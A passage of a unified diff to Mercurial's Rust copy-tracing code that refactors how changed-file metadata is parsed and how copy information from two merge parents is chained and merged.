@@ -51,7 +126,8 @@
Removed(&'a HgPath),
/// The parent → children edge introduces copy information between (dest,
/// source)
- Copied(&'a HgPath, &'a HgPath),
+ CopiedFromP1(&'a HgPath, &'a HgPath),
+ CopiedFromP2(&'a HgPath, &'a HgPath),
}
/// This expresses the possible "special" case we can get in a merge
@@ -67,9 +143,6 @@
Normal,
}
-type FileChange<'a> = (u8, &'a HgPath, &'a HgPath);
-
-const EMPTY: &[u8] = b"";
const COPY_MASK: u8 = 3;
const P1_COPY: u8 = 2;
const P2_COPY: u8 = 3;
@@ -78,142 +151,94 @@
const MERGED: u8 = 8;
const SALVAGED: u8 = 16;
-impl<'a> ChangedFiles<'a> {
- const INDEX_START: usize = 4;
- const ENTRY_SIZE: u32 = 9;
- const FILENAME_START: u32 = 1;
- const COPY_SOURCE_START: u32 = 5;
+#[derive(BytesCast)]
+#[repr(C)]
+struct ChangedFilesIndexEntry {
+ flags: u8,
- pub fn new(data: &'a [u8]) -> Self {
- assert!(
- data.len() >= 4,
- "data size ({}) is too small to contain the header (4)",
- data.len()
- );
- let nb_items_raw: [u8; 4] = (&data[0..=3])
- .try_into()
- .expect("failed to turn 4 bytes into 4 bytes");
- let nb_items = u32::from_be_bytes(nb_items_raw);
+ /// Only the end position is stored. The start is at the end of the
+ /// previous entry.
+ destination_path_end_position: unaligned::U32Be,
- let index_size = (nb_items * Self::ENTRY_SIZE) as usize;
- let index_end = Self::INDEX_START + index_size;
+ source_index_entry_position: unaligned::U32Be,
+}
+
+fn _static_assert_size_of() {
+ let _ = std::mem::transmute::<ChangedFilesIndexEntry, [u8; 9]>;
+}
- assert!(
- data.len() >= index_end,
- "data size ({}) is too small to fit the index_data ({})",
- data.len(),
- index_end
- );
+/// Represents the files affected by a changeset.
+///
+/// This holds a subset of `mercurial.metadata.ChangingFiles` as we do not need
+/// all the data categories tracked by it.
+pub struct ChangedFiles<'a> {
+ index: &'a [ChangedFilesIndexEntry],
+ paths: &'a [u8],
+}
- let ret = ChangedFiles {
- nb_items,
- index: &data[Self::INDEX_START..index_end],
- data: &data[index_end..],
- };
- let max_data = ret.filename_end(nb_items - 1) as usize;
- assert!(
- ret.data.len() >= max_data,
- "data size ({}) is too small to fit all data ({})",
- data.len(),
- index_end + max_data
- );
- ret
+impl<'a> ChangedFiles<'a> {
+ pub fn new(data: &'a [u8]) -> Self {
+ let (header, rest) = unaligned::U32Be::from_bytes(data).unwrap();
+ let nb_index_entries = header.get() as usize;
+ let (index, paths) =
+ ChangedFilesIndexEntry::slice_from_bytes(rest, nb_index_entries)
+ .unwrap();
+ Self { index, paths }
}
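// An illustrative sketch (not part of the patch) of the layout parsed
// above: a big-endian u32 entry count, then 9-byte index entries, then the
// concatenated destination paths. A single entry recording the removal of
// "dst" could be built as:
//
//     let mut data = Vec::new();
//     data.extend_from_slice(&1u32.to_be_bytes()); // one index entry
//     data.push(REMOVED);                          // flags
//     data.extend_from_slice(&3u32.to_be_bytes()); // "dst" ends at offset 3
//     data.extend_from_slice(&0u32.to_be_bytes()); // source index (unused)
//     data.extend_from_slice(b"dst");              // path data
//     let files = ChangedFiles::new(&data);
//     // files.iter_actions() then yields Action::Removed("dst").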
pub fn new_empty() -> Self {
ChangedFiles {
- nb_items: 0,
- index: EMPTY,
- data: EMPTY,
+ index: &[],
+ paths: &[],
}
}
- /// internal function to return an individual entry at a given index
- fn entry(&'a self, idx: u32) -> FileChange<'a> {
- if idx >= self.nb_items {
- panic!(
- "index for entry is higher that the number of file {} >= {}",
- idx, self.nb_items
- )
- }
- let flags = self.flags(idx);
- let filename = self.filename(idx);
- let copy_idx = self.copy_idx(idx);
- let copy_source = self.filename(copy_idx);
- (flags, filename, copy_source)
- }
-
- /// internal function to return the filename of the entry at a given index
- fn filename(&self, idx: u32) -> &HgPath {
- let filename_start;
- if idx == 0 {
- filename_start = 0;
+ /// Internal function to return the filename of the entry at a given index
+ fn path(&self, idx: usize) -> &HgPath {
+ let start = if idx == 0 {
+ 0
} else {
- filename_start = self.filename_end(idx - 1)
- }
- let filename_end = self.filename_end(idx);
- let filename_start = filename_start as usize;
- let filename_end = filename_end as usize;
- HgPath::new(&self.data[filename_start..filename_end])
- }
-
- /// internal function to return the flag field of the entry at a given
- /// index
- fn flags(&self, idx: u32) -> u8 {
- let idx = idx as usize;
- self.index[idx * (Self::ENTRY_SIZE as usize)]
- }
-
- /// internal function to return the end of a filename part at a given index
- fn filename_end(&self, idx: u32) -> u32 {
- let start = (idx * Self::ENTRY_SIZE) + Self::FILENAME_START;
- let end = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START;
- let start = start as usize;
- let end = end as usize;
- let raw = (&self.index[start..end])
- .try_into()
- .expect("failed to turn 4 bytes into 4 bytes");
- u32::from_be_bytes(raw)
- }
-
- /// internal function to return index of the copy source of the entry at a
- /// given index
- fn copy_idx(&self, idx: u32) -> u32 {
- let start = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START;
- let end = (idx + 1) * Self::ENTRY_SIZE;
- let start = start as usize;
- let end = end as usize;
- let raw = (&self.index[start..end])
- .try_into()
- .expect("failed to turn 4 bytes into 4 bytes");
- u32::from_be_bytes(raw)
+ self.index[idx - 1].destination_path_end_position.get() as usize
+ };
+ let end = self.index[idx].destination_path_end_position.get() as usize;
+ HgPath::new(&self.paths[start..end])
}
/// Return an iterator over all the `Action` in this instance.
- fn iter_actions(&self, parent: Parent) -> ActionsIterator {
- ActionsIterator {
- changes: &self,
- parent: parent,
- current: 0,
- }
+ fn iter_actions(&self) -> impl Iterator<Item = Action> {
+ self.index.iter().enumerate().flat_map(move |(idx, entry)| {
+ let path = self.path(idx);
+ if (entry.flags & ACTION_MASK) == REMOVED {
+ Some(Action::Removed(path))
+ } else if (entry.flags & COPY_MASK) == P1_COPY {
+ let source_idx =
+ entry.source_index_entry_position.get() as usize;
+ Some(Action::CopiedFromP1(path, self.path(source_idx)))
+ } else if (entry.flags & COPY_MASK) == P2_COPY {
+ let source_idx =
+ entry.source_index_entry_position.get() as usize;
+ Some(Action::CopiedFromP2(path, self.path(source_idx)))
+ } else {
+ None
+ }
+ })
}
/// return the MergeCase value associated with a filename
fn get_merge_case(&self, path: &HgPath) -> MergeCase {
- if self.nb_items == 0 {
+ if self.index.is_empty() {
return MergeCase::Normal;
}
let mut low_part = 0;
- let mut high_part = self.nb_items;
+ let mut high_part = self.index.len();
while low_part < high_part {
let cursor = (low_part + high_part - 1) / 2;
- let (flags, filename, _source) = self.entry(cursor);
- match path.cmp(filename) {
+ match path.cmp(self.path(cursor)) {
Ordering::Less => low_part = cursor + 1,
Ordering::Greater => high_part = cursor,
Ordering::Equal => {
- return match flags & ACTION_MASK {
+ return match self.index[cursor].flags & ACTION_MASK {
MERGED => MergeCase::Merged,
SALVAGED => MergeCase::Salvaged,
_ => MergeCase::Normal,
@@ -225,100 +250,6 @@
}
}
-/// A struct responsible for answering "is X ancestors of Y" quickly
-///
-/// The structure will delegate ancestors call to a callback, and cache the
-/// result.
-#[derive(Debug)]
-struct AncestorOracle<'a, A: Fn(Revision, Revision) -> bool> {
- inner: &'a A,
- pairs: HashMap<(Revision, Revision), bool>,
-}
-
-impl<'a, A: Fn(Revision, Revision) -> bool> AncestorOracle<'a, A> {
- fn new(func: &'a A) -> Self {
- Self {
- inner: func,
- pairs: HashMap::default(),
- }
- }
-
- fn record_overwrite(&mut self, anc: Revision, desc: Revision) {
- self.pairs.insert((anc, desc), true);
- }
-
- /// returns `true` if `anc` is an ancestors of `desc`, `false` otherwise
- fn is_overwrite(&mut self, anc: Revision, desc: Revision) -> bool {
- if anc > desc {
- false
- } else if anc == desc {
- true
- } else {
- if let Some(b) = self.pairs.get(&(anc, desc)) {
- *b
- } else {
- let b = (self.inner)(anc, desc);
- self.pairs.insert((anc, desc), b);
- b
- }
- }
- }
-}
-
-struct ActionsIterator<'a> {
- changes: &'a ChangedFiles<'a>,
- parent: Parent,
- current: u32,
-}
-
-impl<'a> Iterator for ActionsIterator<'a> {
- type Item = Action<'a>;
-
- fn next(&mut self) -> Option<Action<'a>> {
- let copy_flag = match self.parent {
- Parent::FirstParent => P1_COPY,
- Parent::SecondParent => P2_COPY,
- };
- while self.current < self.changes.nb_items {
- let (flags, file, source) = self.changes.entry(self.current);
- self.current += 1;
- if (flags & ACTION_MASK) == REMOVED {
- return Some(Action::Removed(file));
- }
- let copy = flags & COPY_MASK;
- if copy == copy_flag {
- return Some(Action::Copied(file, source));
- }
- }
- return None;
- }
-}
-
-/// A small struct whose purpose is to ensure lifetime of bytes referenced in
-/// ChangedFiles
-///
-/// It is passed to the RevInfoMaker callback who can assign any necessary
-/// content to the `data` attribute. The copy tracing code is responsible for
-/// keeping the DataHolder alive at least as long as the ChangedFiles object.
-pub struct DataHolder<D> {
- /// RevInfoMaker callback should assign data referenced by the
- /// ChangedFiles struct it return to this attribute. The DataHolder
- /// lifetime will be at least as long as the ChangedFiles one.
- pub data: Option<D>,
-}
-
-pub type RevInfoMaker<'a, D> =
- Box<dyn for<'r> Fn(Revision, &'r mut DataHolder<D>) -> RevInfo<'r> + 'a>;
-
-/// enum used to carry information about the parent → child currently processed
-#[derive(Copy, Clone, Debug)]
-enum Parent {
- /// The `p1(x) → x` edge
- FirstParent,
- /// The `p2(x) → x` edge
- SecondParent,
-}
-
/// A small "tokenizer" responsible for turning full HgPath into lighter
/// PathToken
///
@@ -345,123 +276,110 @@
}
fn untokenize(&self, token: PathToken) -> &HgPathBuf {
- assert!(token < self.path.len(), format!("Unknown token: {}", token));
+ assert!(token < self.path.len(), "Unknown token: {}", token);
&self.path[token]
}
}
/// Same as mercurial.copies._combine_changeset_copies, but in Rust.
-///
-/// Arguments are:
-///
-/// revs: all revisions to be considered
-/// children: a {parent → [childrens]} mapping
-/// target_rev: the final revision we are combining copies to
-/// rev_info(rev): callback to get revision information:
-/// * first parent
-/// * second parent
-/// * ChangedFiles
-/// isancestors(low_rev, high_rev): callback to check if a revision is an
-/// ancestor of another
-pub fn combine_changeset_copies<A: Fn(Revision, Revision) -> bool, D>(
- revs: Vec<Revision>,
- mut children_count: HashMap<Revision, usize>,
- target_rev: Revision,
- rev_info: RevInfoMaker<D>,
- is_ancestor: &A,
-) -> PathCopies {
- let mut all_copies = HashMap::new();
- let mut oracle = AncestorOracle::new(is_ancestor);
-
- let mut path_map = TwoWayPathMap::default();
-
- for rev in revs {
- let mut d: DataHolder<D> = DataHolder { data: None };
- let (p1, p2, changes) = rev_info(rev, &mut d);
+pub struct CombineChangesetCopies {
+ all_copies: HashMap<Revision, InternalPathCopies>,
+ path_map: TwoWayPathMap,
+ children_count: HashMap<Revision, usize>,
+}
- // We will chain the copies information accumulated for the parent with
- // the individual copies information the curent revision. Creating a
- // new TimeStampedPath for each `rev` → `children` vertex.
- let mut copies: Option<TimeStampedPathCopies> = None;
- if p1 != NULL_REVISION {
- // Retrieve data computed in a previous iteration
- let parent_copies = get_and_clean_parent_copies(
- &mut all_copies,
- &mut children_count,
- p1,
- );
- if let Some(parent_copies) = parent_copies {
- // combine it with data for that revision
- let vertex_copies = add_from_changes(
- &mut path_map,
- &mut oracle,
- &parent_copies,
- &changes,
- Parent::FirstParent,
- rev,
- );
- // keep that data around for potential later combination
- copies = Some(vertex_copies);
- }
- }
- if p2 != NULL_REVISION {
- // Retrieve data computed in a previous iteration
- let parent_copies = get_and_clean_parent_copies(
- &mut all_copies,
- &mut children_count,
- p2,
- );
- if let Some(parent_copies) = parent_copies {
- // combine it with data for that revision
- let vertex_copies = add_from_changes(
- &mut path_map,
- &mut oracle,
- &parent_copies,
- &changes,
- Parent::SecondParent,
- rev,
- );
-
- copies = match copies {
- None => Some(vertex_copies),
- // Merge has two parents needs to combines their copy
- // information.
- //
- // If we got data from both parents, We need to combine
- // them.
- Some(copies) => Some(merge_copies_dict(
- &path_map,
- rev,
- vertex_copies,
- copies,
- &changes,
- &mut oracle,
- )),
- };
- }
- }
- match copies {
- Some(copies) => {
- all_copies.insert(rev, copies);
- }
- _ => {}
+impl CombineChangesetCopies {
+ pub fn new(children_count: HashMap<Revision, usize>) -> Self {
+ Self {
+ all_copies: HashMap::new(),
+ path_map: TwoWayPathMap::default(),
+ children_count,
}
}
- // Drop internal information (like the timestamp) and return the final
- // mapping.
- let tt_result = all_copies
- .remove(&target_rev)
- .expect("target revision was not processed");
- let mut result = PathCopies::default();
- for (dest, tt_source) in tt_result {
- if let Some(path) = tt_source.path {
- let path_dest = path_map.untokenize(dest).to_owned();
- let path_path = path_map.untokenize(path).to_owned();
- result.insert(path_dest, path_path);
+ /// Combine the given `changes` data specific to `rev` with the data
+ /// previously given for its parents (and transitively, its ancestors).
+ pub fn add_revision(
+ &mut self,
+ rev: Revision,
+ p1: Revision,
+ p2: Revision,
+ changes: ChangedFiles<'_>,
+ ) {
+ self.add_revision_inner(rev, p1, p2, changes.iter_actions(), |path| {
+ changes.get_merge_case(path)
+ })
+ }
+
+ /// Separated out from `add_revision` so that unit tests can call this
+ /// without synthesizing a `ChangedFiles` in binary format.
+ fn add_revision_inner<'a>(
+ &mut self,
+ rev: Revision,
+ p1: Revision,
+ p2: Revision,
+ copy_actions: impl Iterator<Item = Action<'a>>,
+ get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy,
+ ) {
+ // Retrieve data computed in a previous iteration
+ let p1_copies = match p1 {
+ NULL_REVISION => None,
+ _ => get_and_clean_parent_copies(
+ &mut self.all_copies,
+ &mut self.children_count,
+ p1,
+ ), // will be None if the vertex is not to be traversed
+ };
+ let p2_copies = match p2 {
+ NULL_REVISION => None,
+ _ => get_and_clean_parent_copies(
+ &mut self.all_copies,
+ &mut self.children_count,
+ p2,
+ ), // will be None if the vertex is not to be traversed
+ };
+ // combine it with data for that revision
+ let (p1_copies, p2_copies) = chain_changes(
+ &mut self.path_map,
+ p1_copies,
+ p2_copies,
+ copy_actions,
+ rev,
+ );
+ let copies = match (p1_copies, p2_copies) {
+ (None, None) => None,
+ (c, None) => c,
+ (None, c) => c,
+ (Some(p1_copies), Some(p2_copies)) => Some(merge_copies_dict(
+ &self.path_map,
+ rev,
+ p2_copies,
+ p1_copies,
+ get_merge_case,
+ )),
+ };
+ if let Some(c) = copies {
+ self.all_copies.insert(rev, c);
}
}
- result
+
+ /// Drop intermediate data (such as which revision a copy was from) and
+ /// return the final mapping.
+ pub fn finish(mut self, target_rev: Revision) -> PathCopies {
+ let tt_result = self
+ .all_copies
+ .remove(&target_rev)
+ .expect("target revision was not processed");
+ let mut result = PathCopies::default();
+ for (dest, tt_source) in tt_result {
+ if let Some(path) = tt_source.path {
+ let path_dest = self.path_map.untokenize(dest).to_owned();
+ let path_path = self.path_map.untokenize(path).to_owned();
+ result.insert(path_dest, path_path);
+ }
+ }
+ result
+ }
}
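// An illustrative caller-side sketch (not part of the patch); `rev_info`,
// `revs_in_topological_order` and `children_count` are hypothetical
// stand-ins for what the bindings provide. Parents must be fed before their
// children, and `children_count` must cover every revision visited:
//
//     let mut combine = CombineChangesetCopies::new(children_count);
//     for rev in revs_in_topological_order {
//         let (p1, p2, changes) = rev_info(rev);
//         combine.add_revision(rev, p1, p2, changes);
//     }
//     let copies: PathCopies = combine.finish(target_rev);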
/// fetch previous computed information
@@ -471,68 +389,67 @@
///
/// If parent is not part of the set we are expected to walk, return None.
fn get_and_clean_parent_copies(
- all_copies: &mut HashMap<Revision, TimeStampedPathCopies>,
+ all_copies: &mut HashMap<Revision, InternalPathCopies>,
children_count: &mut HashMap<Revision, usize>,
parent_rev: Revision,
-) -> Option<TimeStampedPathCopies> {
+) -> Option<InternalPathCopies> {
let count = children_count.get_mut(&parent_rev)?;
*count -= 1;
if *count == 0 {
match all_copies.remove(&parent_rev) {
Some(c) => Some(c),
- None => Some(TimeStampedPathCopies::default()),
+ None => Some(InternalPathCopies::default()),
}
} else {
match all_copies.get(&parent_rev) {
Some(c) => Some(c.clone()),
- None => Some(TimeStampedPathCopies::default()),
+ None => Some(InternalPathCopies::default()),
}
}
}
/// Combine ChangedFiles with some existing PathCopies information and return
/// the result
-fn add_from_changes<A: Fn(Revision, Revision) -> bool>(
+fn chain_changes<'a>(
path_map: &mut TwoWayPathMap,
- oracle: &mut AncestorOracle<A>,
- base_copies: &TimeStampedPathCopies,
- changes: &ChangedFiles,
- parent: Parent,
+ base_p1_copies: Option<InternalPathCopies>,
+ base_p2_copies: Option<InternalPathCopies>,
+ copy_actions: impl Iterator<Item = Action<'a>>,
current_rev: Revision,
-) -> TimeStampedPathCopies {
- let mut copies = base_copies.clone();
- for action in changes.iter_actions(parent) {
+) -> (Option<InternalPathCopies>, Option<InternalPathCopies>) {
+ // Fast path the "nothing to do" case.
+ if let (None, None) = (&base_p1_copies, &base_p2_copies) {
+ return (None, None);
+ }
+
+ let mut p1_copies = base_p1_copies.clone();
+ let mut p2_copies = base_p2_copies.clone();
+ for action in copy_actions {
match action {
- Action::Copied(path_dest, path_source) => {
- let dest = path_map.tokenize(path_dest);
- let source = path_map.tokenize(path_source);
- let entry;
- if let Some(v) = base_copies.get(&source) {
- entry = match &v.path {
- Some(path) => Some((*(path)).to_owned()),
- None => Some(source.to_owned()),
- }
- } else {
- entry = Some(source.to_owned());
+ Action::CopiedFromP1(path_dest, path_source) => {
+ match &mut p1_copies {
+ None => (), // This is not a vertex we should process.
+ Some(copies) => add_one_copy(
+ current_rev,
+ path_map,
+ copies,
+ base_p1_copies.as_ref().unwrap(),
+ path_dest,
+ path_source,
+ ),
}
- // Each new entry is introduced by the children, we
- // record this information as we will need it to take
- // the right decision when merging conflicting copy
- // information. See merge_copies_dict for details.
- match copies.entry(dest) {
- Entry::Vacant(slot) => {
- let ttpc = TimeStampedPathCopy {
- rev: current_rev,
- path: entry,
- };
- slot.insert(ttpc);
- }
- Entry::Occupied(mut slot) => {
- let mut ttpc = slot.get_mut();
- oracle.record_overwrite(ttpc.rev, current_rev);
- ttpc.rev = current_rev;
- ttpc.path = entry;
- }
+ }
+ Action::CopiedFromP2(path_dest, path_source) => {
+ match &mut p2_copies {
+ None => (), // This is not a vertex we should process.
+ Some(copies) => add_one_copy(
+ current_rev,
+ path_map,
+ copies,
+ base_p2_copies.as_ref().unwrap(),
+ path_dest,
+ path_source,
+ ),
}
}
Action::Removed(deleted_path) => {
@@ -540,164 +457,131 @@
//
// We need to explicitly record them as dropped to
// propagate this information when merging two
- // TimeStampedPathCopies object.
+ // InternalPathCopies object.
let deleted = path_map.tokenize(deleted_path);
- copies.entry(deleted).and_modify(|old| {
- oracle.record_overwrite(old.rev, current_rev);
- old.rev = current_rev;
- old.path = None;
- });
+
+ let p1_entry = match &mut p1_copies {
+ None => None,
+ Some(copies) => match copies.entry(deleted) {
+ Entry::Occupied(e) => Some(e),
+ Entry::Vacant(_) => None,
+ },
+ };
+ let p2_entry = match &mut p2_copies {
+ None => None,
+ Some(copies) => match copies.entry(deleted) {
+ Entry::Occupied(e) => Some(e),
+ Entry::Vacant(_) => None,
+ },
+ };
+
+ match (p1_entry, p2_entry) {
+ (None, None) => (),
+ (Some(mut e), None) => {
+ e.get_mut().mark_delete(current_rev)
+ }
+ (None, Some(mut e)) => {
+ e.get_mut().mark_delete(current_rev)
+ }
+ (Some(mut e1), Some(mut e2)) => {
+ let cs1 = e1.get_mut();
+ let cs2 = e2.get();
+ if cs1 == cs2 {
+ cs1.mark_delete(current_rev);
+ } else {
+ cs1.mark_delete_with_pair(current_rev, &cs2);
+ }
+ e2.insert(cs1.clone());
+ }
+ }
}
}
}
- copies
+ (p1_copies, p2_copies)
+}
+
+// Insert one new piece of copy information into an InternalPathCopies.
+//
+// This deals with chaining and overwrites.
+fn add_one_copy(
+ current_rev: Revision,
+ path_map: &mut TwoWayPathMap,
+ copies: &mut InternalPathCopies,
+ base_copies: &InternalPathCopies,
+ path_dest: &HgPath,
+ path_source: &HgPath,
+) {
+ let dest = path_map.tokenize(path_dest);
+ let source = path_map.tokenize(path_source);
+ let entry;
+ if let Some(v) = base_copies.get(&source) {
+ entry = match &v.path {
+ Some(path) => Some((*(path)).to_owned()),
+ None => Some(source.to_owned()),
+ }
+ } else {
+ entry = Some(source.to_owned());
+ }
+ // Each new entry is introduced by the children; we
+ // record this information as we will need it to make
+ // the right decision when merging conflicting copy
+ // information. See merge_copies_dict for details.
+ match copies.entry(dest) {
+ Entry::Vacant(slot) => {
+ let ttpc = CopySource::new(current_rev, entry);
+ slot.insert(ttpc);
+ }
+ Entry::Occupied(mut slot) => {
+ let ttpc = slot.get_mut();
+ ttpc.overwrite(current_rev, entry);
+ }
+ }
}
/// merge two copies-mapping together, minor and major
///
/// In case of conflict, value from "major" will be picked, unless in some
/// cases. See inline documentation for details.
-fn merge_copies_dict<A: Fn(Revision, Revision) -> bool>(
+fn merge_copies_dict(
path_map: &TwoWayPathMap,
current_merge: Revision,
- mut minor: TimeStampedPathCopies,
- mut major: TimeStampedPathCopies,
- changes: &ChangedFiles,
- oracle: &mut AncestorOracle<A>,
-) -> TimeStampedPathCopies {
- // This closure exist as temporary help while multiple developper are
- // actively working on this code. Feel free to re-inline it once this
- // code is more settled.
- let mut cmp_value =
- |dest: &PathToken,
- src_minor: &TimeStampedPathCopy,
- src_major: &TimeStampedPathCopy| {
- compare_value(
- path_map,
- current_merge,
- changes,
- oracle,
- dest,
- src_minor,
- src_major,
- )
- };
- if minor.is_empty() {
- major
- } else if major.is_empty() {
- minor
- } else if minor.len() * 2 < major.len() {
- // Lets says we are merging two TimeStampedPathCopies instance A and B.
- //
- // If A contains N items, the merge result will never contains more
- // than N values differents than the one in A
- //
- // If B contains M items, with M > N, the merge result will always
- // result in a minimum of M - N value differents than the on in
- // A
- //
- // As a result, if N < (M-N), we know that simply iterating over A will
- // yield less difference than iterating over the difference
- // between A and B.
- //
- // This help performance a lot in case were a tiny
- // TimeStampedPathCopies is merged with a much larger one.
- for (dest, src_minor) in minor {
- let src_major = major.get(&dest);
- match src_major {
- None => major.insert(dest, src_minor),
- Some(src_major) => {
- match cmp_value(&dest, &src_minor, src_major) {
- MergePick::Any | MergePick::Major => None,
- MergePick::Minor => major.insert(dest, src_minor),
- }
- }
+ minor: InternalPathCopies,
+ major: InternalPathCopies,
+ get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy,
+) -> InternalPathCopies {
+ use crate::utils::{ordmap_union_with_merge, MergeResult};
+
+ ordmap_union_with_merge(minor, major, |&dest, src_minor, src_major| {
+ let (pick, overwrite) = compare_value(
+ current_merge,
+ || get_merge_case(path_map.untokenize(dest)),
+ src_minor,
+ src_major,
+ );
+ if overwrite {
+ let (winner, loser) = match pick {
+ MergePick::Major | MergePick::Any => (src_major, src_minor),
+ MergePick::Minor => (src_minor, src_major),
};
- }
- major
- } else if major.len() * 2 < minor.len() {
- // This use the same rational than the previous block.
- // (Check previous block documentation for details.)
- for (dest, src_major) in major {
- let src_minor = minor.get(&dest);
- match src_minor {
- None => minor.insert(dest, src_major),
- Some(src_minor) => {
- match cmp_value(&dest, src_minor, &src_major) {
- MergePick::Any | MergePick::Minor => None,
- MergePick::Major => minor.insert(dest, src_major),
- }
+ MergeResult::UseNewValue(CopySource::new_from_merge(
+ current_merge,
+ winner,
+ loser,
+ ))
+ } else {
+ match pick {
+ MergePick::Any | MergePick::Major => {
+ MergeResult::UseRightValue
}
- };
- }
- minor
- } else {
- let mut override_minor = Vec::new();
- let mut override_major = Vec::new();
-
- let mut to_major = |k: &PathToken, v: &TimeStampedPathCopy| {
- override_major.push((k.clone(), v.clone()))
- };
- let mut to_minor = |k: &PathToken, v: &TimeStampedPathCopy| {
- override_minor.push((k.clone(), v.clone()))
- };
-
- // The diff function leverage detection of the identical subpart if
- // minor and major has some common ancestors. This make it very
- // fast is most case.
- //
- // In case where the two map are vastly different in size, the current
- // approach is still slowish because the iteration will iterate over
- // all the "exclusive" content of the larger on. This situation can be
- // frequent when the subgraph of revision we are processing has a lot
- // of roots. Each roots adding they own fully new map to the mix (and
- // likely a small map, if the path from the root to the "main path" is
- // small.
- //
- // We could do better by detecting such situation and processing them
- // differently.
- for d in minor.diff(&major) {
- match d {
- DiffItem::Add(k, v) => to_minor(k, v),
- DiffItem::Remove(k, v) => to_major(k, v),
- DiffItem::Update { old, new } => {
- let (dest, src_major) = new;
- let (_, src_minor) = old;
- match cmp_value(dest, src_minor, src_major) {
- MergePick::Major => to_minor(dest, src_major),
- MergePick::Minor => to_major(dest, src_minor),
- // If the two entry are identical, no need to do
- // anything (but diff should not have yield them)
- MergePick::Any => unreachable!(),
- }
- }
- };
- }
-
- let updates;
- let mut result;
- if override_major.is_empty() {
- result = major
- } else if override_minor.is_empty() {
- result = minor
- } else {
- if override_minor.len() < override_major.len() {
- updates = override_minor;
- result = minor;
- } else {
- updates = override_major;
- result = major;
- }
- for (k, v) in updates {
- result.insert(k, v);
+ MergePick::Minor => MergeResult::UseLeftValue,
}
}
- result
- }
+ })
}
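// For illustration, the contract assumed of `ordmap_union_with_merge` above:
// keys present in only one of `minor`/`major` are kept as-is; for keys
// present in both, the closure decides via `MergeResult::UseLeftValue`
// (minor), `MergeResult::UseRightValue` (major), or
// `MergeResult::UseNewValue(v)` (a freshly built merged `CopySource`).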
/// represent the side that should prevail when merging two
-/// TimeStampedPathCopies
+/// InternalPathCopies
+#[derive(Debug, PartialEq)]
enum MergePick {
/// The "major" (p1) side prevails
Major,
@@ -709,89 +593,88 @@
/// decide which side prevails in case of conflicting values
#[allow(clippy::if_same_then_else)]
-fn compare_value<A: Fn(Revision, Revision) -> bool>(
- path_map: &TwoWayPathMap,
+fn compare_value(
current_merge: Revision,
- changes: &ChangedFiles,
- oracle: &mut AncestorOracle<A>,
- dest: &PathToken,
- src_minor: &TimeStampedPathCopy,
- src_major: &TimeStampedPathCopy,
-) -> MergePick {
- if src_major.rev == current_merge {
- if src_minor.rev == current_merge {
- if src_major.path.is_none() {
- // We cannot get different copy information for both p1 and p2
- // from the same revision. Unless this was a
- // deletion
- MergePick::Any
- } else {
- unreachable!();
- }
- } else {
- // The last value comes the current merge, this value -will- win
- // eventually.
- oracle.record_overwrite(src_minor.rev, src_major.rev);
- MergePick::Major
- }
+ merge_case_for_dest: impl Fn() -> MergeCase,
+ src_minor: &CopySource,
+ src_major: &CopySource,
+) -> (MergePick, bool) {
+ if src_major == src_minor {
+ (MergePick::Any, false)
+ } else if src_major.rev == current_merge {
+ // minor is different, per the minor == major check earlier
+ debug_assert!(src_minor.rev != current_merge);
+
+ // The last value comes the current merge, this value -will- win
+ // eventually.
+ (MergePick::Major, true)
} else if src_minor.rev == current_merge {
// The last value comes the current merge, this value -will- win
// eventually.
- oracle.record_overwrite(src_major.rev, src_minor.rev);
- MergePick::Minor
+ (MergePick::Minor, true)
} else if src_major.path == src_minor.path {
+ debug_assert!(src_major.rev != src_minor.rev);
// we have the same value, but from another source;
- if src_major.rev == src_minor.rev {
- // If the two entry are identical, they are both valid
- MergePick::Any
- } else if oracle.is_overwrite(src_major.rev, src_minor.rev) {
- MergePick::Minor
+ if src_major.is_overwritten_by(src_minor) {
+ (MergePick::Minor, false)
+ } else if src_minor.is_overwritten_by(src_major) {
+ (MergePick::Major, false)
} else {
- MergePick::Major
+ (MergePick::Any, true)
}
- } else if src_major.rev == src_minor.rev {
- // We cannot get copy information for both p1 and p2 in the
- // same rev. So this is the same value.
- unreachable!(
- "conflict information from p1 and p2 in the same revision"
- );
} else {
- let dest_path = path_map.untokenize(*dest);
- let action = changes.get_merge_case(dest_path);
- if src_major.path.is_none() && action == MergeCase::Salvaged {
+ debug_assert!(src_major.rev != src_minor.rev);
+ let action = merge_case_for_dest();
+ if src_minor.path.is_some()
+ && src_major.path.is_none()
+ && action == MergeCase::Salvaged
+ {
// If the file is "deleted" in the major side but was
// salvaged by the merge, we keep the minor side alive
- MergePick::Minor
- } else if src_minor.path.is_none() && action == MergeCase::Salvaged {
+ (MergePick::Minor, true)
+ } else if src_major.path.is_some()
+ && src_minor.path.is_none()
+ && action == MergeCase::Salvaged
+ {
// If the file is "deleted" in the minor side but was
+ // salvaged by the merge, unconditionally preserve the
// major side.
- MergePick::Major
- } else if action == MergeCase::Merged {
- // If the file was actively merged, copy information
- // from each side might conflict. The major side will
- // win such conflict.
- MergePick::Major
- } else if oracle.is_overwrite(src_major.rev, src_minor.rev) {
- // If the minor side is strictly newer than the major
- // side, it should be kept.
- MergePick::Minor
- } else if src_major.path.is_some() {
- // without any special case, the "major" value win
- // other the "minor" one.
- MergePick::Major
- } else if oracle.is_overwrite(src_minor.rev, src_major.rev) {
- // the "major" rev is a direct ancestors of "minor",
- // any different value should
- // overwrite
- MergePick::Major
+ (MergePick::Major, true)
+ } else if src_minor.is_overwritten_by(src_major) {
+ // The information from the minor version is strictly older than
+ // the major version
+ if action == MergeCase::Merged {
+ // If the file was actively merged, it means some non-copy
+ // activity happened on the other branch. It
+ // means the older copy information is still relevant.
+ //
+ // The major side wins such a conflict.
+ (MergePick::Major, true)
+ } else {
+ // No activity on the minor branch, pick the newer one.
+ (MergePick::Major, false)
+ }
+ } else if src_major.is_overwritten_by(src_minor) {
+ if action == MergeCase::Merged {
+ // If the file was actively merged, it means some non-copy
+ // activity happened on the other branch. It
+ // means the older copy information is still relevant.
+ //
+ // The major side wins such a conflict.
+ (MergePick::Major, true)
+ } else {
+ // No activity on the minor branch, pick the newer one.
+ (MergePick::Minor, false)
+ }
+ } else if src_minor.path.is_none() {
+ // the minor side has no relevant information, pick the alive one
+ (MergePick::Major, true)
+ } else if src_major.path.is_none() {
+ // the major side has no relevant information, pick the alive one
+ (MergePick::Minor, true)
} else {
- // major version is None (so the file was deleted on
- // that branch) and that branch is independant (neither
- // minor nor major is an ancestors of the other one.)
